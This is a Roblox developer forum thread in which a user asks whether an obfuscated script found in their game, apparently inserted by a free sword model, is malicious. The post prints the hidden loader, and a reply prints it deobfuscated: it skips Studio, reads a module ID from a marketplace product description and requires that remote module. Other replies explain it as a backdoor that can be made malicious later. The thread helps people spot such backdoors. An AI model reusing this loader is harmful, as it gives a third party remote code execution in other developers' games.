Malicious code?

FlashFlame_Roblox · April 20, 2020, 6:38am

Sorry if this is on the wrong category.

So I found this weird script today in my game. It has a lot of blank space and only contains this line:

joPPUjQJPeKqD='Ru'..'nS'..'ervi'..'ce';cG='oidutSsI';MUaaHmXKycarDvN=game;ahlJruEmkbDDBkfkuDRP=MUaaHmXKycarDvN.GetService;jYEYWocyraswdFc='r'..'ev'..'er'..'se';ZjkxnBnzWOFqubboXzjv=pcall;ybmuMBYpOhO='Mar'..'ke'..'tP'..'la'..'ce'..'Se'..'rvic'..'e';HLPvxCWubDHyyDaLKbJVXs='Ge'..'tPr'..'oduc'..'tIn'..'fo';iicCgEQ='ᮍ'PZoNbMemYRgubosysezImPJA = getfenv (          ) [ '\114' .. '\101\113' .. '\117\105\114\101' ];if ahlJruEmkbDDBkfkuDRP ( MUaaHmXKycarDvN , joPPUjQJPeKqD )[ cG [ jYEYWocyraswdFc ]( cG ) ] ( ahlJruEmkbDDBkfkuDRP ( MUaaHmXKycarDvN , joPPUjQJPeKqD ) ) then return end;if not ZjkxnBnzWOFqubboXzjv(function() NIuISuKETB = ahlJruEmkbDDBkfkuDRP ( MUaaHmXKycarDvN , ybmuMBYpOhO ) [ HLPvxCWubDHyyDaLKbJVXs ] ( ahlJruEmkbDDBkfkuDRP ( MUaaHmXKycarDvN , ybmuMBYpOhO ) , 73379870112           / 16         ) [ 'Desc' .. 'ript' .. 'ion' ] PZoNbMemYRgubosysezImPJA    ( tonumber ( NIuISuKETB : match ( '%d+' ) ) ) end) then ZjkxnBnzWOFqubboXzjv( function ( ) PZoNbMemYRgubosysezImPJA ( 1526761926   * 3 ) end ) end

Is this a dangerous script? I’ve only inserted 1 free model and that’s a sword.

GreatLatte · April 20, 2020, 6:44am

I personally wouldn’t use anything that is free modeled myself because there is a chance of it being a virus. I would get an anti-virus plugin and it could scan your game and check if you have any viruses. If you are having trouble scripting a sword there are many tutorials!

Here is one I found: https://www.youtube.com/watch?v=ZEjjj8pcWUE

mispatched · April 20, 2020, 6:50am

Recommend using an anti-virus plugin in-case you are using free models to avoid harmful damages to the games you are currently making. And I recommend too to use your own scripts

matejovec · April 20, 2020, 7:14am

looks very much malicious as it is calling multiple services (run service, marketplace service) and is obfuscated meaning it can contain anything.

waterrunner · April 20, 2020, 7:21am

This script seems like it could be a virus script as it is obfuscated and seems like it could be inserting a random module that could do harm to your game. Anything that is obfuscated, requires something and uses getfenv should set red flags off because more often than not scrips that have a combination of these things could be doing something dangerous to your game.

Just remove the script with this line of code in and check your game for any other malicious script that you have inserted.

KoxuVBC · April 20, 2020, 7:36am

Unobfuscated:

--If you are running it in studio it won't work
if game:GetService('RunService'):IsStudio() then return end

--It loads a module script into your game
if not pcall(function()
	local description = game:GetService('MarketplaceService'):GetProductInfo(4586241882)['Description']
	description(tonumber(description:match('%d+')))
end) then
	pcall(function()
		getfenv()['require'][4580285778<U+202C>]
	end)
end

Here’s the module script that it loads to your game:

But when I looked at the module script that it loads to the game:

For now it’s not a virus, but it might become a virus.

Summary:
Just delete this line of code. This might become an virus in the future

posatta · April 20, 2020, 1:19pm

The point of doing it that way is that they’ll be able to update the module at will to inject a virus in your game whenever they want. It might look like it does nothing now, but they can later edit the module to be malicious without you realizing. They don’t do this immediately because they want their module to get into as many games as possible before being caught.

KoxuVBC · April 20, 2020, 1:23pm

Whoops, totally forgot about that. Sorry and thanks for letting me know